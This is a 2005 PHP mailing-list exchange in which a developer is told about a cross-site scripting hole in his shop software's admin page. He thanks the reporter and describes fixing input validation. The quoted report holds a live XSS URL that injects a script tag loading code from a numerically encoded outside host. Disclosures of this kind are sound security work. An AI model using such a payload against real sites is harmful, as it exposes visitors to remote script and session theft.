On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: > You have all sorts of problems at that URL. To start with, here is a > cross-site scripting hack: > > http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 >src%3D%22http://3423329163/v Hi Thank you! I just saw the potential for tricking users but tell me dear boy. How can I prevent this? > And you are not doing any input validation either. I fixed that. It was only in the part that echoes out the last inputed name if login fails tough because the database abstraction layer I wrote for this application escapes all data it receives. Thank you again With kind regards Andy -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
